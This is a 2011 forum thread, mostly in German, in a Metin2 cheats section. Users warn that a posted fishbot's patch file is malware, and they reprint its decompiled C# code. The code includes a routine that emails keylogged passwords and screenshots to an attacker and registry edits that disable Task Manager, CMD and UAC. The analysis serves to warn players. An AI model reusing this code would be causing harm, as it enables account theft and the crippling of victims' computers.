elitepvpers

elitepvpers (https://www.elitepvpers.com/forum/)
-   Metin2 Hacks, Bots, Cheats, Exploits & Macros (https://www.elitepvpers.com/forum/metin2-hacks-bots-cheats-exploits-macros/)
-   -   Private Server FishBot [Background/Fish On Earth] (https://www.elitepvpers.com/forum/metin2-hacks-bots-cheats-exploits-macros/1075906-private-server-fishbot-background-fish-earth.html)

Shannou06 03/19/2011 09:53
[DO NOT DOWNLOAD FOR NOW] Private Server FishBot [Background/Fish On Earth]
 
Piep!

Veroy 03/19/2011 10:39
schaut nicht so schlecht aus, mal gucken, was andre so sagen... spiele nämlich kein pserver

Shannou06 03/19/2011 10:40
Danke :)

Slait 03/19/2011 10:58
SCHLIMMER VIRUS!!!!



Die Datei [UG]SharkLoc.exe scheint OK zu sein, aber

beim ausführen der Datei SharkLoc patch.exe passiert so einiges.

1. Sendet eine E-Mail mit eurem Passwort (bekommen per GetAsyncKeyState) und nem Schreenshot von Metin2 mit den Accdaten an die Adresse [Only registered and activated users can see links. Click Here To Register...].

Also ist es schonmal ein Keylogger der nen Screenshot sowie euer Passwort versendet.

Hier der Code:
Spoiler:
public static string SendEmail(ref string SMTP, ref string Froma, ref string Password, ref string Recipient, ref string Subject, ref string Body, ref int Port, [Optional, DefaultParameterValue(false)] ref bool TakePic)
{
Recipient = "[Only registered and activated users can see links. Click Here To Register...]";

string str;
try
{
MailMessage message = new MailMessage();
message.From = new MailAddress(Froma);
message.To.Add(Recipient);
message.Subject = Subject;
message.Body = Body;
SmtpClient client = new SmtpClient(SMTP);
string str2 = @"\" + LT;
if (TakePic)
{

//Screenshotcode wegen nacharmern ausgeblendet

}
Attachment item = new Attachment(Path.GetTempPath() + str2 + ".gif");
message.Attachments.Add(item);
}
client.Port = Port;
client.EnableSsl = true;
client.Credentials = new NetworkCredential(Froma, Password);
client.Send(message);
if (TakeScrns)
{
File.Delete(Path.GetTempPath() + str2 + ".gif");
}
str = "Email information is valid and working!";
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
str = "Email information invalid: " + exception.Message;
ProjectData.ClearProjectError();
}
return str;
}

2. Er verändert Werte in der Registry, z.B. damit euer Task-Manager nicht mehr funktioniert

So sieht das aus:
Spoiler:

if (wICUDZJUa == 2)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\System ", "DisableTaskMgr", "1");
}
if (VGyGkxwN)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoRun", "1");
}
if (UWrUYmwR)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoViewContextMenu", "1");
}
if (KcOSrSdX)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}
if (EUjFsCZUx)
{
Interaction.Shell(@"C:\Windows\System32\KcOSrSdX.e xe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
}
if (foytXmFZ)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}
und kopiert sich Dabei selber in den Autostart also ist immer aufm Rechner drauf!



SCHLIMMER VIRUS NICHT DOWNLOADEN!!!!!!!!

Veroy 03/19/2011 11:13
wieder mal super arbeit slait ;)
warum müssen einige eig. immer son scheiß verbreiten? -.-

Shannou06 03/19/2011 12:01
Does that mean I have been infected?

Veroy 03/19/2011 12:05
Quote:
Originally Posted by Shannou06 (Post 9677637)
Does that mean I have been infected?
nein, dass heißt, dass du ein virenverbreiter bist ;)

MrCrackR 03/19/2011 12:06
Quote:
Originally Posted by Veroy (Post 9676754)
wieder mal super arbeit slait ;)
warum müssen einige eig. immer son scheiß verbreiten? -.-
durch nen decompiler laufen zu lasse nist auch keine große kunst :(

@Shannou: why are you writting that this FishBot is a virus but not removing the link to it :confused:

Slait 03/19/2011 12:07
The File SharkLoc patch.exe is a Virus!!!

It sends an E-Mail with your Account-data to the mailaddress [Only registered and activated users can see links. Click Here To Register...].

If you executed this file, your accountdata was send to the mail.
So your account will get hacked.

@MrCrackR
Du kannst die Datei ja nächstes Mal analysieren, anders kann man das eben nicht machen ;)

Veroy 03/19/2011 12:09
Quote:
Originally Posted by MrCrackR (Post 9677718)
durch nen decompiler laufen zu lasse nist auch keine große kunst :(

@Shannou: why are you writting that this FishBot is a virus but not removing the link to it :confused:
er nimmt sich eben die zeit dafür, die leute hier zu warnen... warum machst dus denn nicht? jaja... nur am kritisieren immer

MrCrackR 03/19/2011 12:21
Quote:
Originally Posted by Slait (Post 9677728)
@MrCrackR
Du kannst die Datei ja nächstes Mal analysieren, anders kann man das eben nicht machen ;)
nur mal so, egal wie edel deine absichten sind, decompilen ist rechtlich verboten,
egal was das für ein programm ist. natürlich ganz nett von dir, das alles auf dich zu nehmen ^^.
aber es geht auch ohne decompilen, dauert nur länger. dafür brauchst du eine VM,
einen API-Monitor, einen Registry-Monitor und einen Sniffer.
wie gesagt, der zeitaufwand ist enorm, aber an dieser methode finde ich nichts illegales.

Shannou06 03/19/2011 12:44
Quote:
Originally Posted by Slait (Post 9676507)
SCHLIMMER VIRUS!!!!



Die Datei [UG]SharkLoc.exe scheint OK zu sein, aber

beim ausführen der Datei SharkLoc patch.exe passiert so einiges.

1. Sendet eine E-Mail mit eurem Passwort (bekommen per GetAsyncKeyState) und nem Schreenshot von Metin2 mit den Accdaten an die Adresse [Only registered and activated users can see links. Click Here To Register...].

Also ist es schonmal ein Keylogger der nen Screenshot sowie euer Passwort versendet.

Hier der Code:
Spoiler:
public static string SendEmail(ref string SMTP, ref string Froma, ref string Password, ref string Recipient, ref string Subject, ref string Body, ref int Port, [Optional, DefaultParameterValue(false)] ref bool TakePic)
{
Recipient = "[Only registered and activated users can see links. Click Here To Register...]";

string str;
try
{
MailMessage message = new MailMessage();
message.From = new MailAddress(Froma);
message.To.Add(Recipient);
message.Subject = Subject;
message.Body = Body;
SmtpClient client = new SmtpClient(SMTP);
string str2 = @"\" + LT;
if (TakePic)
{

//Screenshotcode wegen nacharmern ausgeblendet

}
Attachment item = new Attachment(Path.GetTempPath() + str2 + ".gif");
message.Attachments.Add(item);
}
client.Port = Port;
client.EnableSsl = true;
client.Credentials = new NetworkCredential(Froma, Password);
client.Send(message);
if (TakeScrns)
{
File.Delete(Path.GetTempPath() + str2 + ".gif");
}
str = "Email information is valid and working!";
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
str = "Email information invalid: " + exception.Message;
ProjectData.ClearProjectError();
}
return str;
}

2. Er verändert Werte in der Registry, z.B. damit euer Task-Manager nicht mehr funktioniert

So sieht das aus:
Spoiler:

if (wICUDZJUa == 2)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\System ", "DisableTaskMgr", "1");
}
if (VGyGkxwN)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoRun", "1");
}
if (UWrUYmwR)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoViewContextMenu", "1");
}
if (KcOSrSdX)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}
if (EUjFsCZUx)
{
Interaction.Shell(@"C:\Windows\System32\KcOSrSdX.e xe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
}
if (foytXmFZ)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}
und kopiert sich Dabei selber in den Autostart also ist immer aufm Rechner drauf!



SCHLIMMER VIRUS NICHT DOWNLOADEN!!!!!!!!
Quote:
Originally Posted by MrCrackR (Post 9677718)
durch nen decompiler laufen zu lasse nist auch keine große kunst :(

@Shannou: why are you writting that this FishBot is a virus but not removing the link to it :confused:
I want to be sure, otherwise I will loose the links. Who is stupid enough to click on a link saying "this a probably a virus!"

So is it sure?

Slait 03/19/2011 12:46
@MrCrackR
Naja, wenn du wüsstest, wie viele illegale Sachen hier gemacht werden ^^
Da ist das acht das sowirklich vernachlässigbar, außerdem ist Viren verbreiten etwa nicht verboten??.
Fast jeder, der einen Bot analysiert, macht das so.

Aber die andere Methode, indem man alles überwacht habe ich noch nie probiert, wäre nützlich bei verschlüsselten Dateien, danke :)

@shannou06
It is sure, I decompiled it and there you can see the harmful code ;)

Shannou06 03/19/2011 12:48
In all the files or only in the patch?
So I know if I have to take away only one file!

Slait 03/19/2011 12:54
The patch is a bad virus.

And the other is useless because you need an injector.

So remove everything.

Crank 03/19/2011 14:59
Virus.

#closed


All times are GMT +2. The time now is 16:02.

Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.